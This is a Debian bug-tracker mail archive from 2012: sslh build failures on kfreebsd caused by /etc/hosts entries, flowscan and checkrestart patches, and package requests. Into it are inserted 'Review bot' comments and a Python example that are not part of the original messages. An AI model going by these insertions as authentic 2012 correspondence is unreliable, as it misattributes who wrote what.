 localhost:9002:bind: Address already in use
 exited with 1
 not ok 24 - Exit status on non-existant username
 #   Failed test 'Exit status on non-existant username'
 #   at ./t line 249.
 #  got: '1'
 # expected: '2'
 ***Test: Can't open PID file
 spawned 21451
 ssh addr: localhost:9000. libwrap service: sshd family 28 28
 ssl addr: localhost:9001. libwrap service: (null) family 28 28
 listening on:
   localhost:9002
   localhost:9002
 timeout to ssh: 2
 listening to 2 addresses
 localhost:9002:bind: Address already in use
 exited with 1
 not ok 25 - Exit status if can't open PID file
 #   Failed test 'Exit status if can't open PID file'
 #   at ./t line 265.
 #  got: '1'
 # expected: '3'
 ***Test: Can't bind address
 
 I've contacted a kfreebsd build admin who should make some changes
 in /etc/hosts in schroot to fix all these issues.
 

Thanks to christoph, sslh now builds on kfreebsd-*.
I can really close this bug.


-- 
Guillaume Delacour g...@iroqwa.org




Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-20 Thread Guillaume Delacour
On Wednesday 07 March 2012 at 02:33 +0100, Guillaume Delacour wrote:
 
 I'm afraid there is another problem with fano and field schroots:
 127.0.0.1 appears to point twice to localhost, so sslh tries to listen
 twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
 I've pinged christoph on irc to know if it is possible to fix /etc/hosts
 on these boxes, otherwise I'll refresh the patch I've made to bind to
 127.0.0.1 and not localhost.
 
 --
 Guillaume Delacour g...@iroqwa.org

The 1.10-3 version does not completely fix the problem: there are still
other issues with localhost entries in /etc/hosts on the buildd:

***Test: Changing to non-existant username
spawned 21450
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on:
localhost:9002
localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 24 - Exit status on non-existant username
#   Failed test 'Exit status on non-existant username'
#   at ./t line 249.
#  got: '1'
# expected: '2'
***Test: Can't open PID file
spawned 21451
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on:
localhost:9002
localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 25 - Exit status if can't open PID file
#   Failed test 'Exit status if can't open PID file'
#   at ./t line 265.
#  got: '1'
# expected: '3'
***Test: Can't bind address

I've contacted a kfreebsd build admin who should make some changes
in /etc/hosts in schroot to fix all these issues.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-06 Thread Guillaume Delacour
Hi,

On Thursday 23 February 2012 at 22:46 +0100, Guillaume Delacour wrote:
 It seems to be a problem on both buildd kfreebsd hosts fano and field:
 the ip6-localhost entry points to 127.0.0.1 (with correct entries, on a
 fresh install of debian/kfreebsd for example, the problem does not
 appear).
 
 As a workaround, I can patch the upstream test suite to force it to bind to
 the IPv6 loopback ::1 instead of ip6-localhost.
 

I'm afraid there is another problem with fano and field schroots:
127.0.0.1 appears to point twice to localhost, so sslh tries to listen
twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
I've pinged christoph on irc to know if it is possible to fix /etc/hosts
on these boxes, otherwise I'll refresh the patch I've made to bind to
127.0.0.1 and not localhost.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#635065: RFP: whatweb -- Next generation web scanner' from 'ITP: whatweb -- Next generation web scanner

2012-03-05 Thread Guillaume Delacour
I don't think I have the time to maintain another package (which is written
in Ruby, which I don't really know), but I think it could be
interesting to introduce it to Debian; please find attached the work
I started a few months ago, in case it can be reused by the
future maintainer.

-- 
Guillaume Delacour g...@iroqwa.org


whatweb_0.4.7-1.debian.tar.gz
Description: application/compressed-tar




Bug#620960: RFS: inspircd

2012-03-04 Thread Guillaume Delacour
On Saturday 03 March 2012 at 14:53 +0100, Helmut Grohne wrote:
 On Wed, Dec 14, 2011 at 10:25:37PM +0100, Guillaume Delacour wrote:
  On Saturday 03 December 2011 at 11:39 +0100, Jan Lübbe wrote:
   On Tue, 2011-11-01 at 22:00 +0100, Guillaume Delacour wrote: 
To access further information about this package, please visit the 
following URL:

  http://mentors.debian.net/package/inspircd

Alternatively, one can download the package with dget using this 
command:

  dget -x http://mentors.debian.net/debian/pool/main/i/inspircd/inspircd_2.0.5-1.dsc
   
   It seems you've replaced that package with a new one on 2011-11-30. Did
   you want that one uploaded, too?
  
  Yes, the package on mentors (2011-11-30) is the package I want to upload
  to the archive (I forgot to include some stuff a few days ago and
  regenerated/reuploaded it on mentors).
 
 Since the mentors migrated to debexpo your package is 404. Can you
 reupload? Additionally I suggest that you also report a bug against
 sponsorship-requests with severity important, as your upload fixes an
 RC bug.

I just reuploaded the package as it was removed from mentors on the 25th of
February.

 
 Helmut

-- 
Guillaume Delacour g...@iroqwa.org




Bug#660044: flowscan: diff for NMU version 1.006-13.1

2012-03-02 Thread Guillaume Delacour
On Tuesday 28 February 2012 at 00:53 +0100, Leo Iannacone wrote:
 tags 660044 + patch
 tags 660044 + pending
 thanks
 
 Dear maintainer,
 
 I've prepared an NMU for flowscan (versioned as 1.006-13.1) and
 uploaded it to DELAYED/3. Please feel free to tell me if I
 should delay it longer.

Hello,

I acknowledge this; I saw your message too late to find a sponsor
for fixing the bug.

I tried for a while to work on a new version of the package which integrates
direct upstream changes (and these modifications are made by the
previous maintainer) into quilt patches, but never finalized it.

 
 Regards.
 reverted:
 --- flowscan-1.006/configure.in
 +++ flowscan-1.006.orig/configure.in
 @@ -135,13 +135,13 @@
  
  dnl Checks for misc.
  
 +AC_MSG_CHECKING(that service name for 80/tcp is http)
 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, 
 tcp)? 0 : 1)'
 -AC_MSG_CHECKING(that service name for 80/tcp is www)
 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, 
 tcp)? 0 : 1)'
  then
 AC_MSG_RESULT(yes)
  else
 AC_MSG_RESULT(no)
 +   AC_MSG_ERROR(Please change /etc/services so that the service name for 
 80/tcp is http with alias www, www-http)
 -   AC_MSG_ERROR(Please change /etc/services so that the service name for 
 80/tcp is www with alias http, www-http)
  fi
  
  AC_OUTPUT(Makefile flowscan graphs.mf example/crontab util/locker 
 util/add_ds.pl util/add_txrx util/event2vrule util/ip2hostname)
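Review bot: The AC_MSG_ERROR text on the added line contains an unquoted comma ("... is http with alias www, www-http"), so m4 splits the macro call there and the words after the comma are passed as a second argument instead of being printed; wrap the message in [ ] so the whole sentence reaches the user. The test also still accepts exactly one primary name for 80/tcp, so a build host whose /etc/services orders the names the other way aborts configure; accepting either http or www would make the build independent of the host's services file.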
 reverted:
 --- flowscan-1.006/configure
 +++ flowscan-1.006.orig/configure
 @@ -1296,14 +1296,14 @@
  
 
 
 +echo $ac_n checking that service name for 80/tcp is http... $ac_c 16
 +echo configure:1301: checking that service name for 80/tcp is http 5
 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, 
 tcp)? 0 : 1)'
 -echo $ac_n checking that service name for 80/tcp is www... $ac_c 16
 -echo configure:1301: checking that service name for 80/tcp is www 5
 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, 
 tcp)? 0 : 1)'
  then
 echo $ac_tyes 16
  else
 echo $ac_tno 16
 +   { echo configure: error: Please change /etc/services so that the service 
 name for 80/tcp is http with alias www 12; exit 1; }
 -   { echo configure: error: Please change /etc/services so that the service 
 name for 80/tcp is www with alias http 12; exit 1; }
  fi
  
  trap '' 1 2 15
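Review bot: The generated configure script is edited by hand here in parallel with configure.in, and the two copies do not say the same thing: the error message on the added line ends at "with alias www", while the configure.in line reads "with alias www, www-http". Regenerating configure from configure.in as part of the build, or at least stating in the changelog that both files are patched, would keep the two from drifting apart on the next change.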
 diff -u flowscan-1.006/debian/changelog flowscan-1.006/debian/changelog
 --- flowscan-1.006/debian/changelog
 +++ flowscan-1.006/debian/changelog
 @@ -1,3 +1,11 @@
 +flowscan (1.006-13.1) unstable; urgency=low
 +
 +  * Non-maintainer upload.
 +  * Fix configure looking for http service instead of www
 +(Closes: 660044, LP: #935087). 
 +
 + -- Leo Iannacone l...@ubuntu.com  Tue, 28 Feb 2012 00:50:32 +0100
 +
  flowscan (1.006-13) unstable; urgency=low
  
* New maintainer (Closes: #402663).
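Review bot: The changelog line "Fix configure looking for http service instead of www" can be read in either direction; state explicitly which name configure now expects as the primary service name for 80/tcp. The bug reference is also written "Closes: 660044" without the "#" that the entry directly below uses ("Closes: #402663"); using the same form keeps the changelog consistent.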
 
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-02-23 Thread Guillaume Delacour
Hi,

On Friday 17 February 2012 at 22:03 +0100, Luca Falavigna wrote:
 Source: sslh
 Version: 1.10-1
 Severity: serious
 Justification: fails to build from source
 
 
 sslh fails to build from source on kfreebsd-*, but built in the past:
 
 Connection refused
 ***Test: big message
 Connection refused
 ***Test: Stalled connection
 Connection refused
 Connection refused
 cat: /tmp/sslh_test.pid: No such file or directory
 killing
 Can't kill a non-numeric process ID at ./t line 192.
 # Looks like your test exited with 1 before it could output anything.
 make[1]: *** [test] Error 1
 
 https://buildd.debian.org/status/fetch.php?pkg=sslh&arch=kfreebsd-amd64&ver=1.10-1&stamp=1328484132
 https://buildd.debian.org/status/fetch.php?pkg=sslh&arch=kfreebsd-i386&ver=1.10-1&stamp=1328499099
 
 
 

It seems to be a problem on both buildd kfreebsd hosts fano and field:
the ip6-localhost entry points to 127.0.0.1 (with correct entries, on a
fresh install of debian/kfreebsd for example, the problem does not
appear).

As a workaround, I can patch the upstream test suite to force it to bind to
the IPv6 loopback ::1 instead of ip6-localhost.

-- 
Guillaume Delacour g...@iroqwa.org




Bug#659420: flowscan: Uses perl4 corelibs without Depends

2012-02-13 Thread Guillaume Delacour
On Friday 10 February 2012 at 23:44 +, Dominic Hargreaves wrote:
 Package: flowscan
 Version: 1.006-13
 Severity: normal
 User: debian-p...@lists.debian.org
 Usertags: perl4-corelibs
 
 Dear maintainer,

Hello,

 
 This package currently uses one or more deprecated perl 4 era packages,
 as shown on the lintian report[1]:
 
 usr/bin/locker:7 getopts.pl
 
 As detailed at [2] we would like you to either add a dependency on
 
 libperl4-corelibs-perl | perl ( 5.12.3-7)
 
 or (ideally) to replace their use with more modern equivalents.
 We'd like to have this in place for wheezy, so that we can follow
 cleanly the upstream deprecation cycle in wheezy+1.
 
 If you prefer, I will NMU your package with the dependency added.

Go ahead, I lack time to update this package.
Thanks.

 
 The wiki page [2] has references (taken from the source of the libraries
 in question) for the recommended replacement libraries.
 
 Thanks,
 Dominic.
 
 [1] http://lintian.debian.org/tags/script-uses-perl4-libs-without-dep.html
 [2] 
 http://wiki.debian.org/Teams/DebianPerlGroup/OpenTasks/Transitions/Perl4CoreLibs
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#657087: checkrestart: Detect real command for interpreted languages

2012-01-23 Thread Guillaume Delacour
Package: debian-goodies
Version: 0.59
Severity: wishlist
Tags: patch

Hello,

Checkrestart is very useful for daemons written in C, but fails to detect the
real command when the daemon is written in an interpreted language.

(As an example) I propose the attached patch, which reads /proc/pid/cmdline
only when the executable command (/proc/pid/exe) is linked to an
interpreter (the regex is definitely not complete; I only tested it for perl and
python daemons running on my boxes). With this, the command passed to
dpkg-search --search successfully finds the initscript used to restart the
daemon.

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.38-12-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages debian-goodies depends on:
ii  curl  7.23.1-3
ii  dctrl-tools [grep-dctrl]  2.20.1
ii  dialog1.1-20111020-1
ii  less  444-1
ii  perl  5.14.2-6
ii  python2.7.2-9
ii  whiptail  0.52.14-7

Versions of packages debian-goodies recommends:
ii  lsof  4.81.dfsg.1-1

Versions of packages debian-goodies suggests:
pn  popularity-contest  none
pn  xdg-utils   1.1.0~rc1+git20111210-5
pn  zenity  none

-- no debconf information

--- /usr/sbin/checkrestart	2011-10-25 00:20:00.0 +0200
+++ /tmp/checkrestart	2012-01-23 22:59:43.052505207 +0100
@@ -426,6 +426,18 @@
 
 try:
 self.program = os.readlink('/proc/%d/exe' % self.pid)
+# if the executable command is an interpreter such as perl/python,
+# we want to find the real program
+m = re.match(^/usr/bin/(perl|python)$, self.program)
+if m:
+with open('/proc/%d/cmdline' % self.pid, 'r') as cmdline:
+# only match program in /usr (ex.: /usr/sbin/smokeping)
+# ignore child, etc.
+m = re.search(r'^(([/]\w*){1,5})\s.*$', cmdline.read())
+if m:
+# store the real full path of script as the program
+self.program = m.group(1)
+
 except OSError, e:
 if e.errno != errno.ENOENT:
 raise
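Review bot: The added re.search on cmdline.read() expects whitespace between arguments, but /proc/<pid>/cmdline separates arguments with NUL bytes, so "\s" only matches when the process has rewritten its title into one string; for an ordinary "interpreter script args" command line the pattern does not match and self.program stays the interpreter. Split the content on "\0" and take the first non-option argument after the interpreter instead. The first pattern is also anchored to exactly /usr/bin/perl or /usr/bin/python, so a versioned interpreter path such as /usr/bin/python2.7 is skipped, and "\w*" rejects script paths that contain "-" or ".".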
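The lookup described in this message, as an added Python 3 example (not the attached patch and not debian-goodies code): it splits /proc/<pid>/cmdline on its NUL separators and also covers versioned interpreter names, rewritten process titles and the " (deleted)" suffix on the exe link. The function names, the option tables and the sample command lines are assumptions of this example.

```python
import os
import re

# Interpreter basenames with an optional version suffix (python2.7, perl5.14.2).
INTERPRETER_RE = re.compile(r'^(perl|python)[0-9.]*$')
# Options after which there is no script file: code or module is given inline.
INLINE_OPTS = {'perl': ('-e', '-E'), 'python': ('-c', '-m')}
# Options whose value may be passed as the following argument.
VALUE_OPTS = {'perl': ('-I',), 'python': ('-W', '-X')}


def script_from_cmdline(exe, raw_cmdline):
    """Return the script an interpreter is running, or exe when there is none.

    exe is the target of /proc/<pid>/exe, raw_cmdline the bytes of
    /proc/<pid>/cmdline. The process can overwrite its own cmdline, so the
    result is a hint for a package lookup, not proof of what is running.
    """
    # The kernel appends " (deleted)" once the binary on disk was replaced,
    # which is the situation checkrestart is looking for.
    if exe.endswith(' (deleted)'):
        exe = exe[:-len(' (deleted)')]
    m = INTERPRETER_RE.match(os.path.basename(exe))
    if not m:
        return exe
    family = m.group(1)
    args = [a.decode('utf-8', 'replace') for a in raw_cmdline.split(b'\0') if a]
    # A daemon that rewrote its process title (Perl: assignment to $0) leaves
    # one space-separated string instead of NUL-separated arguments.
    if len(args) == 1 and ' ' in args[0]:
        args = args[0].split()
    it = iter(args)
    for index, arg in enumerate(it):
        if index == 0 and INTERPRETER_RE.match(os.path.basename(arg)):
            continue                      # argv[0] is the interpreter itself
        if arg in INLINE_OPTS[family]:
            return exe                    # no script file to report
        if arg in VALUE_OPTS[family]:
            next(it, None)                # skip the option's value
            continue
        if arg.startswith('-'):
            continue                      # any other interpreter option
        # Only an absolute path can be looked up in the package database.
        return arg if arg.startswith('/') else exe
    return exe


def real_program(pid, proc_root='/proc'):
    """Resolve the program behind a live PID (Linux only)."""
    base = os.path.join(proc_root, str(pid))
    with open(os.path.join(base, 'cmdline'), 'rb') as handle:
        raw = handle.read()
    return script_from_cmdline(os.readlink(os.path.join(base, 'exe')), raw)


if __name__ == '__main__':
    # Constructed sample inputs, not captured from a real system.
    print(script_from_cmdline('/usr/bin/python2.7',
                              b'/usr/bin/python\0-u\0/usr/sbin/exampled\0--daemon\0'))
    print(script_from_cmdline('/usr/bin/perl', b'/usr/sbin/smokeping [FPing]\0\0'))
```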


Bug#656891: RFP: bacula-gui -- Bweb is a Bacula web interface

2012-01-22 Thread Guillaume Delacour
Package: wnpp
Severity: wishlist


* Package name: bacula-gui
  Version : 5.0.3
  Upstream Author : Kern Sibbald k...@sibbald.com
* URL : http://sourceforge.net/projects/bacula/
* License : GPL
  Programming Lang: Perl
  Description : Bweb is a Bacula web interface

bacula-gui contains bweb which is a web interface for managing bacula:
reporting, clients status, media management, restore (needs libjs-extjs), etc.
Upstream tarball contains an old debian/ directory which is maybe a good
way to start packaging bweb. Maybe more appropriate to name the package bweb.

At this time, bacula version 5.0.3 is in the archive and I think the version
of bweb needs to be the same (for compatibility and the catalog schema ?).

bacula-gui also contains brestore which is a Perl/Gtk console for restoring
files. The tool seems to be quite old and bat included in the bacula project
seems to be more powerful.

Finally, the bacula-gui tarball also contains bacula-web, which is a reporting
only web tool written in PHP; the project was abandoned in the last few years
and has been revived in 2011 and distributed outside bacula-gui (so no need
to package it).



